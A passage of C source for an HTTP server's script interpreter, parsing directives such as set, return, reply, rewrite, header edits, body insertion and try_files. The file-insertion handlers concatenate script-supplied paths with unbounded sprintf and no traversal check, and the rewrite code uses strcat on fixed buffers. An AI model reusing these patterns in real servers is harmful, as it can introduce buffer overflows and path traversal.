pval = skipToPeer(pbgn, pend-pbgn, '{', '}');
if (!ifbody_exec && condval) {
http_script_parse_exec(hsc, pbgn + 1, pval - pbgn - 1);
ifbody_exec = 1;
}
if (*pval == '}') pval++;
} else if (pend - pbgn >= 2 && str_ncmp(pbgn, "if", 2) == 0) {
/* if (cond) if (cond2) {... } */
pval = script_if_parse(hsc, pbgn, pend-pbgn);
} else {
/* if (cond) ...; find expression end flag ; */
pval = skipTo(pbgn, pend-pbgn, ";", 1);
if (!ifbody_exec && condval) {
http_script_parse_exec(hsc, pbgn, pval - pbgn);
ifbody_exec = 1;
}
if (*pval == ';') pval++;
}
if (hsc->exitflag)
return pval;
/* now skip all 'else if' and 'else', look for the end of 'if' expression */
/* if (cond) { ... } else { ... }
if (cond) { ... } else if { ... }
if (cond) { ... } ... */
pbgn = skipOver(pval, pend-pval, "; \t\r\n\f\v", 7);
if (pbgn >= pend) return pbgn;
/* else if (cond) { ... } or else { ... } */
if (pend - pbgn >= 4 && str_ncmp(pbgn, "else", 4) == 0) {
poct = skipOver(pbgn+4, pend-pbgn-4, " \t\r\n\f\v", 6);
if (poct >= pend) return poct;
if (pend - poct > 2 && str_ncmp(poct, "if", 2) == 0) {
/* else if (...) */
pbgn = poct + 2;
continue;
} else if (pend - poct > 1 && *poct == '{') {
/* else { ... } */
pval = skipToPeer(poct, pend-poct, '{', '}');
if (!ifbody_exec && condval == 0) {
http_script_parse_exec(hsc, poct + 1, pval - poct - 1);
ifbody_exec = 1;
}
if (*pval == '}') pval++;
return pval;
} else {
/* else ... */
pval = skipTo(poct, pend-poct, ";", 1);
if (!ifbody_exec && condval == 0) {
http_script_parse_exec(hsc, poct, pval - poct);
ifbody_exec = 1;
}
if (*pval == ';') pval++;
return pval;
}
} else {
/* no else existing, if expression end! */
return pbgn;
}
}
return pbgn;
}
char * script_assignment_parse (void * vhsc, char * p, int len)
{
HTTPScript * hsc = (HTTPScript *)vhsc;
char * pbgn = NULL;
char * pend = NULL;
char * poct = NULL;
char * pexpend = NULL;
char varname[512];
char value[4096];
if (!hsc) return p;
if (!p) return NULL;
if (len < 0) len = strlen(p);
if (len <= 2) return p;
/* $forward_addr = $remote_addr;
$forward_addr = "192.168.127.12"; */
pbgn = p;
pend = p + len;
pbgn = skipOver(pbgn, len, " \t\r\n\f\v", 6);
if (pbgn >= pend) return pbgn;
pexpend = skipQuoteTo(pbgn, pend-pbgn, ";", 1);
if (*pbgn != '$') return pexpend;
poct = goto_symbol_end(pbgn, pexpend - pbgn);
get_var_name(pbgn, poct-pbgn, varname, sizeof(varname)-1);
pbgn = skipOver(poct, pend-poct, " \t\r\n\f\v", 6);
if (pbgn >= pexpend) return pexpend;
/* = */
for (poct = pbgn; poct < pexpend; poct++) {
if (ISSPACE(*poct)) break;
if (is_exp_char(*poct)) break;
}
if (*pbgn != '=' || poct - pbgn > 1) {
return pexpend;
}
pbgn = skipOver(poct, pend-poct, " \t\r\n\f\v", 6);
if (pbgn >= pexpend) return pexpend;
poct = goto_symbol_end(pbgn, pexpend - pbgn);
get_var_value(hsc, pbgn, poct-pbgn, value, sizeof(value)-1, 1);
http_msg_var_set(hsc->msg, varname, value, strlen(value));
return pexpend;
}
char * script_set_parse (void * vhsc, char * p, int len)
{
HTTPScript * hsc = (HTTPScript *)vhsc;
char * pbgn = NULL;
char * pend = NULL;
char * poct = NULL;
char * pexpend = NULL;
char varname[512];
char value[4096];
if (!hsc) return p;
if (!p) return NULL;
if (len < 0) len = strlen(p);
if (len <= 2) return p;
/* set $forward_addr $remote_addr;
set $forward_addr "192.168.127.12"; */
pbgn = p;
pend = p + len;
pbgn = skipOver(pbgn, len, " \t\r\n\f\v", 6);
if (pbgn >= pend) return pbgn;
pexpend = skipQuoteTo(pbgn, pend-pbgn, ";", 1);
if (pexpend - pbgn < 3) return pexpend;
if (strncasecmp(pbgn, "set", 3) != 0) return pexpend;
pbgn += 3;
pbgn = skipOver(pbgn, pexpend-pbgn, " \t\r\n\f\v", 6);
if (pbgn >= pexpend) return pexpend;
/* extracting variable name */
poct = goto_symbol_end(pbgn, pexpend - pbgn);
get_var_name(pbgn, poct-pbgn, varname, sizeof(varname)-1);
pbgn = skipOver(poct, pend-poct, " \t\r\n\f\v", 6);
if (pbgn >= pexpend) return pexpend;
/* extracting variable value */
poct = goto_symbol_end(pbgn, pexpend - pbgn);
get_var_value(hsc, pbgn, poct-pbgn, value, sizeof(value)-1, 1);
http_msg_var_set(hsc->msg, varname, value, strlen(value));
return pexpend;
}
char * script_return_parse (void * vhsc, char * p, int len)
{
HTTPScript * hsc = (HTTPScript *)vhsc;
char * pbgn = NULL;
char * pend = NULL;
char * poct = NULL;
char * pexpend = NULL;
int ret = 0;
if (!hsc) return p;
if (!p) return NULL;
if (len < 0) len = strlen(p);
if (len <= 2) return p;
/* return $forward_addr;
return "192.168.127.12"; */
pbgn = p;
pend = p + len;
pbgn = skipOver(pbgn, len, " \t\r\n\f\v", 6);
if (pbgn >= pend) return pbgn;
pexpend = skipQuoteTo(pbgn, pend-pbgn, ";", 1);
if (pexpend - pbgn < 6) return pexpend;
if (strncasecmp(pbgn, "return", 6) != 0) return pexpend;
pbgn += 6;
pbgn = skipOver(pbgn, pexpend-pbgn, " \t\r\n\f\v", 6);
if (pbgn >= pexpend) return pexpend;
/* extracting variable value */
poct = goto_symbol_end(pbgn, pexpend - pbgn);
if (poct > pbgn) {
/* get rid of ' or " on the leading or tail side */
poct = rskipOver(poct-1, poct-pbgn, " \t\r\n\f\v", 6);
if (poct >= pbgn) {
if ((*pbgn == '"' || *pbgn == '\'') && *poct == *pbgn) {
pbgn++;
} else poct++;
}
}
ret = http_var_copy(hsc->msg, pbgn, poct-pbgn, NULL,
0, NULL, 0, hsc->vname, hsc->vtype);
if (ret > 0) {
hsc->retval = kalloc(ret + 1);
hsc->retvallen = ret;
http_var_copy(hsc->msg, pbgn, poct-pbgn, hsc->retval, ret,
NULL, 0, hsc->vname, hsc->vtype);
}
hsc->exitflag = 1;
return pexpend;
}
char * script_reply_parse (void * vhsc, char * p, int len)
{
HTTPScript * hsc = (HTTPScript *)vhsc;
HTTPMsg * msg = NULL;
char * pbgn = NULL;
char * pend = NULL;
char * poct = NULL;
char * pval = NULL;
char * pexpend = NULL;
int status = 0;
int ret = 0;
int vallen = 0;
if (!hsc) return p;
msg = (HTTPMsg *)hsc->msg;
if (!msg) return p;
if (!p) return NULL;
if (len < 0) len = strlen(p);
if (len <= 2) return p;
/* reply status_code [ URL or MsgBody ] */
pbgn = p;
pend = p + len;
pbgn = skipOver(pbgn, len, " \t\r\n\f\v", 6);
if (pbgn >= pend) return pbgn;
pexpend = skipQuoteTo(pbgn, pend-pbgn, ";", 1);
if (pexpend - pbgn < 5) return pexpend;
if (strncasecmp(pbgn, "reply", 5) != 0) return pexpend;
pbgn += 5;
pbgn = skipOver(pbgn, pexpend-pbgn, " \t\r\n\f\v", 6);
if (pbgn >= pexpend) return pexpend;
/* extracting variable value */
poct = goto_symbol_end(pbgn, pexpend - pbgn);
/* check if all octets are digits */
for (pval = pbgn; pval < poct; pval++) {
if (!isdigit(*pval)) return pexpend;
}
status = str_to_int(pbgn, poct-pbgn, 10, NULL);
/* extracting redirect URL or MSG body */
pval = NULL;
pbgn = skipOver(poct, pexpend-poct, " \t\r\n\f\v", 6);
poct = goto_symbol_end(pbgn, pexpend - pbgn);
if (poct > pbgn) {
/* get rid of ' or " on the leading or tail side */
poct = rskipOver(poct-1, poct-pbgn, " \t\r\n\f\v", 6);
if (poct >= pbgn) {
if ((*pbgn == '"' || *pbgn == '\'') && *poct == *pbgn) {
pbgn++;
} else poct++;
}
}
if (pbgn < pexpend && poct > pbgn) {
ret = http_var_copy(hsc->msg, pbgn, poct-pbgn, NULL, 0,
NULL, 0, hsc->vname, hsc->vtype);
if (ret > 0) {
pval = kalloc(ret + 1);
vallen = ret;
vallen = http_var_copy(hsc->msg, pbgn, poct-pbgn, pval, ret,
NULL, 0, hsc->vname, hsc->vtype);
            if (vallen >= 2 && (pval[0] == '"' || pval[0] == '\'')) {
                if (pval[vallen-1] == pval[0]) {
                    /* strip the surrounding quotes in place, so pval keeps
                       pointing at the original allocation and the later
                       kfree(pval) stays valid */
                    vallen -= 2;
                    memmove(pval, pval + 1, vallen);
                    pval[vallen] = '\0';
                }
            }
}
}
if (status >= 300 && status < 400) {
if (pval && vallen > 0) {
msg->RedirectReply(msg, status, pval);
} else {
return pexpend;
}
} else {
if (pval && vallen > 0) {
msg->AddResContent(msg, pval, vallen);
}
msg->SetStatus(msg, status, NULL);
msg->Reply(msg);
}
if (pval) kfree(pval);
hsc->exitflag = 1;
hsc->replied = 1;
return pexpend;
}
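
/* Illustrative, hypothetical 'reply' examples matching the syntax parsed
   above ("reply status_code [ URL or MsgBody ]"). A 3xx status requires a
   redirect URL; other status codes may carry an optional body:

     reply 403;
     reply 302 "http://host.example/login";
     reply 200 "service is alive";

   The URL and body strings are placeholders. */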
char * script_rewrite_parse (void * vhsc, char * p, int len)
{
HTTPScript * hsc = (HTTPScript *)vhsc;
HTTPMsg * msg = NULL;
char * pbgn = NULL;
char * pend = NULL;
char * poct = NULL;
char * pval = NULL;
char * pexpend = NULL;
char regstr[512];
char replace[2048];
char flag[64];
char dsturi[2048];
int ret, dstlen;
ckstr_t pmatstr[32];
int i, matnum = 0;
#ifdef UNIX
char uri[2048];
regex_t regobj = {0};
regmatch_t pmat[32];
#endif
#if defined(_WIN32) || defined(_WIN64)
pcre * regobj = NULL;
char * errstr = NULL;
int erroff = 0;
int ovec[36];
#endif
if (!hsc) return p;
msg = (HTTPMsg *)hsc->msg;
if (!msg) return p;
if (!p) return NULL;
if (len < 0) len = strlen(p);
if (len <= 2) return p;
/* rewrite regex replacement [flag] */
pbgn = p;
pend = p + len;
pbgn = skipOver(pbgn, len, " \t\r\n\f\v", 6);
if (pbgn >= pend) return pbgn;
pexpend = skipQuoteTo(pbgn, pend-pbgn, ";", 1);
if (pexpend - pbgn < 7) return pexpend;
if (strncasecmp(pbgn, "rewrite", 7) != 0) return pexpend;
pbgn += 7;
pbgn = skipOver(pbgn, pexpend-pbgn, " \t\r\n\f\v", 6);
if (pbgn >= pexpend) return pexpend;
/* extracting regex string */
regstr[0] = '\0';
pval = poct = skipQuoteTo(pbgn, pexpend - pbgn, " \t\r\n\f\v", 6);
/* get rid of ' or " on the leading or tail side */
if (poct > pbgn) {
poct = rskipOver(poct-1, poct-pbgn, " \t\r\n\f\v", 6);
if (poct >= pbgn) {
if ((*pbgn == '"' || *pbgn == '\'') && *poct == *pbgn) {
pbgn++;
} else poct++;
}
}
if (poct > pbgn) {
str_secpy(regstr, sizeof(regstr)-1, pbgn, poct-pbgn);
}
/* extracting replacement string */
pbgn = skipOver(pval, pexpend-pval, " \t\r\n\f\v", 6);
if (pbgn >= pexpend) return pexpend;
replace[0] = '\0';
pval = poct = skipQuoteTo(pbgn, pexpend - pbgn, " \t\r\n\f\v", 6);
/* get rid of ' or " on the leading or tail side */
if (poct > pbgn) {
poct = rskipOver(poct-1, poct-pbgn, " \t\r\n\f\v", 6);
if (poct >= pbgn) {
if ((*pbgn == '"' || *pbgn == '\'') && *poct == *pbgn) {
pbgn++;
} else poct++;
}
}
if (poct > pbgn) {
str_secpy(replace, sizeof(replace)-1, pbgn, poct-pbgn);
}
flag[0] = '\0';
/* extracting flag string */
pbgn = skipOver(pval, pexpend-pval, " \t\r\n\f\v", 6);
if (pbgn < pexpend) {
pval = poct = skipQuoteTo(pbgn, pexpend - pbgn, " \t\r\n\f\v", 6);
/* get rid of ' or " on the leading or tail side */
if (poct > pbgn) {
poct = rskipOver(poct-1, poct-pbgn, " \t\r\n\f\v", 6);
if (poct >= pbgn) {
if ((*pbgn == '"' || *pbgn == '\'') && *poct == *pbgn) {
pbgn++;
} else poct++;
}
}
if (poct > pbgn) {
str_secpy(flag, sizeof(flag)-1, pbgn, poct-pbgn);
}
}
#ifdef UNIX
    if (regcomp(&regobj, regstr, REG_EXTENDED | REG_ICASE) != 0) {
        regfree(&regobj);
return pexpend;
}
str_secpy(uri, sizeof(uri)-1, msg->req_path, msg->req_pathlen);
    ret = regexec(&regobj, uri, 32, pmat, 0);
if (ret == 0) {
for (i = 0, matnum = 0; i < 32; i++) {
if (pmat[i].rm_so >= 0) {
pmatstr[matnum].p = uri + pmat[i].rm_so;
pmatstr[matnum].len = pmat[i].rm_eo - pmat[i].rm_so;
matnum++;
continue;
}
break;
}
        regfree(&regobj);
} else {
        regfree(&regobj);
return pexpend;
}
#endif
#if defined(_WIN32) || defined(_WIN64)
regobj = pcre_compile(regstr, PCRE_CASELESS, &errstr, &erroff, NULL);
if (!regobj) return pexpend;
ret = pcre_exec(regobj, NULL, msg->req_path, msg->req_pathlen, 0, 0, ovec, 36);
if (ret <= 0) {
pcre_free(regobj);
return pexpend;
}
for (i = 0, matnum = 0; i < ret; i++) {
pmatstr[matnum].p = msg->req_path + ovec[2 * i];
pmatstr[matnum].len = ovec[2 * i + 1] - ovec[2 * i];
matnum++;
}
pcre_free(regobj);
#endif
dsturi[0] = '\0';
http_var_copy(msg, replace, strlen(replace), dsturi, sizeof(dsturi)-1,
pmatstr, matnum, hsc->vname, hsc->vtype);
if ((dstlen = strlen(dsturi)) <= 0) return pexpend;
if (dsturi[dstlen - 1] != '?') {
if (memchr(dsturi, '?', dstlen) == NULL)
strcat(dsturi, "?");
else
strcat(dsturi, "&");
dstlen += 1;
str_secpy(dsturi + dstlen, sizeof(dsturi)-1-dstlen,
msg->req_query, msg->req_querylen);
dstlen = strlen(dsturi);
    } else {
dsturi[dstlen - 1] = '\0';
dstlen--;
}
if (strcasecmp(flag, "redirect") == 0) {
msg->RedirectReply(msg, 302, dsturi);
hsc->exitflag = 1;
hsc->replied = 1;
return pexpend;
} else if (strcasecmp(flag, "permanent") == 0) {
msg->RedirectReply(msg, 301, dsturi);
hsc->exitflag = 1;
hsc->replied = 1;
return pexpend;
}
if (strcasecmp(flag, "last") == 0) {
msg->SetDocURL(msg, dsturi, dstlen, 0, 0);
hsc->exitflag = 1;
} else if (strcasecmp(flag, "forward") == 0 || strcasecmp(flag, "proxy") == 0) {
        /* dsturi must be an absolute URL; do not re-instantiate the location */
if (msg->SetDocURL(msg, dsturi, dstlen, 0, 1) > 0)
msg->req_url_type = 1;
msg->proxied = 1;
} else if (strcasecmp(flag, "break") == 0) {
/* do not re-instantiate location after setting DocURI, go on executing next line */
msg->SetDocURL(msg, dsturi, dstlen, 0, 1);
} else { //no flag
        /* do not re-instantiate the location after setting the DocURI here.
           after all scripts have executed, the location is re-instantiated at the end */
msg->SetDocURL(msg, dsturi, dstlen, 0, 1);
hsc->reloc = 1;
}
return pexpend;
}
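
/* Illustrative, hypothetical 'rewrite' examples. The regex is matched against
   the request path; $1..$n in the replacement refer to the captured groups;
   the optional flag is one of redirect(302), permanent(301), last,
   forward/proxy or break:

     rewrite ^/old/(.*)$  /new/$1  last;
     rewrite ^/dl/(.*)\.flv$  /media/$1.mp4  permanent;
     rewrite ^/api/(.*)$  http://127.0.0.1:8080/$1  proxy;

   The paths and the backend address above are placeholders. */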
char * script_add_req_header_parse (void * vhsc, char * p, int len)
{
HTTPScript * hsc = (HTTPScript *)vhsc;
HTTPMsg * msg = NULL;
char * pbgn = NULL;
char * pend = NULL;
char * poct = NULL;
char * pexpend = NULL;
char name[512];
char value[4096];
if (!hsc) return p;
msg = (HTTPMsg *)hsc->msg;
if (!msg) return p;
if (!p) return NULL;
if (len < 0) len = strlen(p);
if (len <= 2) return p;
/* addReqHeader x-forward-ip $remote_addr;
addReqHeader x-Real-IP "192.168.127.12"; */
pbgn = p;
pend = p + len;
pbgn = skipOver(pbgn, len, " \t\r\n\f\v", 6);
if (pbgn >= pend) return pbgn;
pexpend = skipQuoteTo(pbgn, pend-pbgn, ";", 1);
if (pexpend - pbgn < 12) return pexpend;
if (strncasecmp(pbgn, "addReqHeader", 12) != 0) return pexpend;
pbgn += 12;
pbgn = skipOver(pbgn, pexpend-pbgn, " \t\r\n\f\v", 6);
if (pbgn >= pexpend) return pexpend;
/* extracting header name */
poct = goto_symbol_end(pbgn, pexpend - pbgn);
get_var_value(hsc, pbgn, poct-pbgn, name, sizeof(name)-1, 0);
pbgn = skipOver(poct, pend-poct, " \t\r\n\f\v", 6);
if (pbgn >= pexpend) return pexpend;
/* extracting header value */
poct = goto_symbol_end(pbgn, pexpend - pbgn);
get_var_value(hsc, pbgn, poct-pbgn, value, sizeof(value)-1, 1);
msg->AddReqHdr(msg, name, strlen(name), value, strlen(value));
return pexpend;
}
char * script_add_res_header_parse (void * vhsc, char * p, int len)
{
HTTPScript * hsc = (HTTPScript *)vhsc;
HTTPMsg * msg = NULL;
char * pbgn = NULL;
char * pend = NULL;
char * poct = NULL;
char * pexpend = NULL;
char name[512];
char value[4096];
if (!hsc) return p;
msg = (HTTPMsg *)hsc->msg;
if (!msg) return p;
if (!p) return NULL;
if (len < 0) len = strlen(p);
if (len <= 2) return p;
/* addResHeader x-forward-ip $remote_addr;
addResHeader x-Real-IP "192.168.127.12"; */
pbgn = p;
pend = p + len;
pbgn = skipOver(pbgn, len, " \t\r\n\f\v", 6);
if (pbgn >= pend) return pbgn;
pexpend = skipQuoteTo(pbgn, pend-pbgn, ";", 1);
if (pexpend - pbgn < 12) return pexpend;
if (strncasecmp(pbgn, "addResHeader", 12) != 0) return pexpend;
pbgn += 12;
pbgn = skipOver(pbgn, pexpend-pbgn, " \t\r\n\f\v", 6);
if (pbgn >= pexpend) return pexpend;
/* extracting header name */
poct = goto_symbol_end(pbgn, pexpend - pbgn);
get_var_value(hsc, pbgn, poct-pbgn, name, sizeof(name)-1, 0);
pbgn = skipOver(poct, pend-poct, " \t\r\n\f\v", 6);
if (pbgn >= pexpend) return pexpend;
/* extracting header value */
poct = goto_symbol_end(pbgn, pexpend - pbgn);
get_var_value(hsc, pbgn, poct-pbgn, value, sizeof(value)-1, 1);
msg->AddResHdr(msg, name, strlen(name), value, strlen(value));
return pexpend;
}
char * script_del_req_header_parse (void * vhsc, char * p, int len)
{
HTTPScript * hsc = (HTTPScript *)vhsc;
HTTPMsg * msg = NULL;
char * pbgn = NULL;
char * pend = NULL;
char * poct = NULL;
char * pexpend = NULL;
char name[512];
if (!hsc) return p;
msg = (HTTPMsg *)hsc->msg;
if (!msg) return p;
if (!p) return NULL;
if (len < 0) len = strlen(p);
if (len <= 2) return p;
/* delReqHeader x-forward-ip;
delReqHeader x-Real-IP; */
pbgn = p;
pend = p + len;
pbgn = skipOver(pbgn, len, " \t\r\n\f\v", 6);
if (pbgn >= pend) return pbgn;
pexpend = skipQuoteTo(pbgn, pend-pbgn, ";", 1);
if (pexpend - pbgn < 12) return pexpend;
if (strncasecmp(pbgn, "delReqHeader", 12) != 0) return pexpend;
pbgn += 12;
pbgn = skipOver(pbgn, pexpend-pbgn, " \t\r\n\f\v", 6);
if (pbgn >= pexpend) return pexpend;
/* extracting header name */
poct = goto_symbol_end(pbgn, pexpend - pbgn);
get_var_value(hsc, pbgn, poct-pbgn, name, sizeof(name)-1, 0);
msg->DelReqHdr(msg, name, strlen(name));
return pexpend;
}
char * script_del_res_header_parse (void * vhsc, char * p, int len)
{
HTTPScript * hsc = (HTTPScript *)vhsc;
HTTPMsg * msg = NULL;
char * pbgn = NULL;
char * pend = NULL;
char * poct = NULL;
char * pexpend = NULL;
char name[512];
if (!hsc) return p;
msg = (HTTPMsg *)hsc->msg;
if (!msg) return p;
if (!p) return NULL;
if (len < 0) len = strlen(p);
if (len <= 2) return p;
/* delResHeader x-forward-ip;
delResHeader x-Real-IP; */
pbgn = p;
pend = p + len;
pbgn = skipOver(pbgn, len, " \t\r\n\f\v", 6);
if (pbgn >= pend) return pbgn;
pexpend = skipQuoteTo(pbgn, pend-pbgn, ";", 1);
if (pexpend - pbgn < 12) return pexpend;
if (strncasecmp(pbgn, "delResHeader", 12) != 0) return pexpend;
pbgn += 12;
pbgn = skipOver(pbgn, pexpend-pbgn, " \t\r\n\f\v", 6);
if (pbgn >= pexpend) return pexpend;
/* extracting header name */
poct = goto_symbol_end(pbgn, pexpend - pbgn);
get_var_value(hsc, pbgn, poct-pbgn, name, sizeof(name)-1, 0);
msg->DelResHdr(msg, name, strlen(name));
return pexpend;
}
char * script_add_res_body_parse (void * vhsc, char * p, int len)
{
HTTPScript * hsc = (HTTPScript *)vhsc;
HTTPMsg * msg = NULL;
char * pbgn = NULL;
char * pend = NULL;
char * poct = NULL;
char * pexpend = NULL;
HeaderUnit * punit = NULL;
int64 val64 = 0;
int64 addlen = 0;
if (!hsc) return p;
msg = (HTTPMsg *)hsc->msg;
if (!msg) return p;
if (!p) return NULL;
if (len < 0) len = strlen(p);
if (len <= 2) return p;
/* addResBody "added body content";
insert the content to the head of response body */
pbgn = p;
pend = p + len;
pbgn = skipOver(pbgn, len, " \t\r\n\f\v", 6);
if (pbgn >= pend) return pbgn;
pexpend = skipQuoteTo(pbgn, pend-pbgn, ";", 1);
if (pexpend - pbgn < 12) return pexpend;
if (strncasecmp(pbgn, "addResBody", 10) != 0) return pexpend;
pbgn += 10;
pbgn = skipOver(pbgn, pexpend-pbgn, " \t\r\n\f\v", 6);
if (pbgn >= pexpend) return pexpend;
/* extracting body value */
poct = goto_symbol_end(pbgn, pexpend - pbgn);
poct = rskipOver(poct-1, poct-pbgn, " \t\r\n\f\v", 6);
if (poct < pbgn) return pexpend;
if ((*pbgn == '"' || *pbgn == '\'') && *poct == *pbgn) {
pbgn++; poct--;
}
if (poct >= pbgn) {
addlen = poct - pbgn + 1;
addlen = chunk_prepend_strip_buffer(msg->res_body_chunk, pbgn, addlen, "\r\n\t\b\f\v'\"\\/", 10, 0);
if (addlen < 0) addlen = 0;
if (msg->res_body_flag == BC_CONTENT_LENGTH) {
punit = http_header_get(msg, 1, "Content-Length", 14);
if (punit) {
val64 = strtoll(punit->value, NULL, 10);
val64 += addlen;
http_header_del(msg, 1, "Content-Length", 14);
} else {
val64 = addlen;
}
http_header_append_int64(msg, 1, "Content-Length", 14, val64);
} else if (msg->res_body_flag == BC_TE) {
if (http_header_get(msg, 1, "Transfer-Encoding", -1) == NULL) {
http_header_append(msg, 1, "Transfer-Encoding", 17, "chunked", 7);
}
}
}
return pexpend;
}
char * script_append_res_body_parse (void * vhsc, char * p, int len)
{
HTTPScript * hsc = (HTTPScript *)vhsc;
HTTPMsg * msg = NULL;
char * pbgn = NULL;
char * pend = NULL;
char * poct = NULL;
char * pexpend = NULL;
HeaderUnit * punit = NULL;
int64 val64 = 0;
int64 addlen = 0;
if (!hsc) return p;
msg = (HTTPMsg *)hsc->msg;
if (!msg) return p;
if (!p) return NULL;
if (len < 0) len = strlen(p);
if (len <= 2) return p;
/* appendResBody "appended body content";
insert the content to the tail of response body */
pbgn = p;
pend = p + len;
pbgn = skipOver(pbgn, len, " \t\r\n\f\v", 6);
if (pbgn >= pend) return pbgn;
pexpend = skipQuoteTo(pbgn, pend-pbgn, ";", 1);
    if (pexpend - pbgn < 13) return pexpend;
if (strncasecmp(pbgn, "appendResBody", 13) != 0) return pexpend;
pbgn += 13;
pbgn = skipOver(pbgn, pexpend-pbgn, " \t\r\n\f\v", 6);
if (pbgn >= pexpend) return pexpend;
/* extracting body value */
poct = goto_symbol_end(pbgn, pexpend - pbgn);
poct = rskipOver(poct-1, poct-pbgn, " \t\r\n\f\v", 6);
if (poct < pbgn) return pexpend;
if ((*pbgn == '"' || *pbgn == '\'') && *poct == *pbgn) {
pbgn++; poct--;
}
if (poct >= pbgn) {
addlen = poct - pbgn + 1;
addlen = chunk_append_strip_buffer(msg->res_body_chunk, pbgn, addlen, "\r\n\t\b\f\v'\"\\/", 10);
if (addlen < 0) addlen = 0;
if (msg->res_body_flag == BC_CONTENT_LENGTH) {
punit = http_header_get(msg, 1, "Content-Length", 14);
if (punit) {
val64 = strtoll(punit->value, NULL, 10);
val64 += addlen;
http_header_del(msg, 1, "Content-Length", 14);
} else {
val64 = addlen;
}
http_header_append_int64(msg, 1, "Content-Length", 14, val64);
} else if (msg->res_body_flag == BC_TE) {
if (http_header_get(msg, 1, "Transfer-Encoding", -1) == NULL) {
http_header_append(msg, 1, "Transfer-Encoding", 17, "chunked", 7);
}
}
}
return pexpend;
}
char * script_add_file_to_res_body_parse (void * vhsc, char * p, int len)
{
HTTPScript * hsc = (HTTPScript *)vhsc;
HTTPMsg * msg = NULL;
char * pbgn = NULL;
char * pend = NULL;
char * poct = NULL;
char * pexpend = NULL;
char fpath[2048];
char value[1024];
HeaderUnit * punit = NULL;
int64 fsize = 0;
int64 val64 = 0;
if (!hsc) return p;
msg = (HTTPMsg *)hsc->msg;
if (!msg) return p;
if (!p) return NULL;
if (len < 0) len = strlen(p);
if (len <= 2) return p;
/* addFile2ResBody /abc/def.js;
addFile2ResBody $file_path */
pbgn = p;
pend = p + len;
pbgn = skipOver(pbgn, len, " \t\r\n\f\v", 6);
if (pbgn >= pend) return pbgn;
pexpend = skipQuoteTo(pbgn, pend-pbgn, ";", 1);
    if (pexpend - pbgn < 15) return pexpend;
if (strncasecmp(pbgn, "addFile2ResBody", 15) != 0) return pexpend;
pbgn += 15;
pbgn = skipOver(pbgn, pexpend-pbgn, " \t\r\n\f\v", 6);
if (pbgn >= pexpend) return pexpend;
/* extracting file path to be appended to body */
poct = goto_symbol_end(pbgn, pexpend - pbgn);
get_var_value(hsc, pbgn, poct-pbgn, value, sizeof(value)-1, 1);
poct = str_trim(value);
if (!poct || strlen(poct) <= 0)
return pexpend;
if (poct[0] == '/') {
sprintf(fpath, "%s", msg->GetRootPath(msg));
sprintf(fpath + strlen(fpath), "%s", poct);
} else {
fpath[0] = '\0';
msg->GetRealPath(msg, fpath, sizeof(fpath)-1);
sprintf(fpath + strlen(fpath), "%s", poct);
}
if (msg->res_body_flag == BC_TE) val64 = 2 * 1024 * 1024;
else val64 = 0;
fsize = chunk_prepend_file(msg->res_body_chunk, fpath, val64);
if (fsize > 0) {
if (msg->res_body_flag == BC_CONTENT_LENGTH) {
punit = http_header_get(msg, 1, "Content-Length", 14);
if (punit) {
val64 = strtoll(punit->value, NULL, 10);
val64 += fsize;
http_header_del(msg, 1, "Content-Length", 14);
} else {
val64 = fsize;
}
http_header_append_int64(msg, 1, "Content-Length", 14, val64);
} else if (msg->res_body_flag == BC_TE) {
if (http_header_get(msg, 1, "Transfer-Encoding", -1) == NULL) {
http_header_append(msg, 1, "Transfer-Encoding", 17, "chunked", 7);
}
}
}
return pexpend;
}
char * script_append_file_to_res_body_parse (void * vhsc, char * p, int len)
{
HTTPScript * hsc = (HTTPScript *)vhsc;
HTTPMsg * msg = NULL;
char * pbgn = NULL;
char * pend = NULL;
char * poct = NULL;
char * pexpend = NULL;
char fpath[2048];
char value[1024];
HeaderUnit * punit = NULL;
int64 fsize = 0;
int64 val64 = 0;
if (!hsc) return p;
msg = (HTTPMsg *)hsc->msg;
if (!msg) return p;
if (!p) return NULL;
if (len < 0) len = strlen(p);
if (len <= 2) return p;
/* appendFile2ResBody /abc/def.js;
appendFile2ResBody $file_path */
pbgn = p;
pend = p + len;
pbgn = skipOver(pbgn, len, " \t\r\n\f\v", 6);
if (pbgn >= pend) return pbgn;
pexpend = skipQuoteTo(pbgn, pend-pbgn, ";", 1);
    if (pexpend - pbgn < 18) return pexpend;
if (strncasecmp(pbgn, "appendFile2ResBody", 18) != 0) return pexpend;
pbgn += 18;
pbgn = skipOver(pbgn, pexpend-pbgn, " \t\r\n\f\v", 6);
if (pbgn >= pexpend) return pexpend;
/* extracting file path to be appended to body */
poct = goto_symbol_end(pbgn, pexpend - pbgn);
get_var_value(hsc, pbgn, poct-pbgn, value, sizeof(value)-1, 1);
poct = str_trim(value);
if (!poct || strlen(poct) <= 0)
return pexpend;
if (poct[0] == '/') {
sprintf(fpath, "%s", msg->GetRootPath(msg));
sprintf(fpath + strlen(fpath), "%s", poct);
} else {
fpath[0] = '\0';
msg->GetRealPath(msg, fpath, sizeof(fpath)-1);
sprintf(fpath + strlen(fpath), "%s", poct);
}
if (msg->res_body_flag == BC_TE) val64 = 2 * 1024 * 1024;
else val64 = 0;
fsize = chunk_append_file(msg->res_body_chunk, fpath, val64);
if (fsize > 0) {
if (msg->res_body_flag == BC_CONTENT_LENGTH) {
punit = http_header_get(msg, 1, "Content-Length", 14);
if (punit) {
val64 = strtoll(punit->value, NULL, 10);
val64 += fsize;
http_header_del(msg, 1, "Content-Length", 14);
} else {
val64 = fsize;
}
http_header_append_int64(msg, 1, "Content-Length", 14, val64);
} else if (msg->res_body_flag == BC_TE) {
if (http_header_get(msg, 1, "Transfer-Encoding", -1) == NULL) {
http_header_append(msg, 1, "Transfer-Encoding", 17, "chunked", 7);
}
}
}
return pexpend;
}
char * script_try_files_parse (void * vhsc, char * p, int len)
{
HTTPScript * hsc = (HTTPScript *)vhsc;
HTTPMsg * msg = NULL;
char * pbgn = NULL;
char * pend = NULL;
char * poct = NULL;
char * pexpend = NULL;
char name[2048];
int namelen = 0;
char path[4092];
uint8 lastitem = 0;
int status = 0;
HTTPHost * phost = NULL;
HTTPLoc * ploc = NULL;
if (!hsc) return p;
msg = (HTTPMsg *)hsc->msg;
if (!msg) return p;
if (!p) return NULL;
if (len < 0) len = strlen(p);
if (len <= 2) return p;
    /* try_files file1 file2 ... uri;
       or try_files file1 file2 ... =code; */
pbgn = p;
pend = p + len;
pbgn = skipOver(pbgn, len, " \t\r\n\f\v", 6);
if (pbgn >= pend) return pbgn;
pexpend = skipQuoteTo(pbgn, pend-pbgn, ";", 1);
if (pexpend - pbgn < 12) return pexpend;
if (strncasecmp(pbgn, "try_files", 9) != 0) return pexpend;
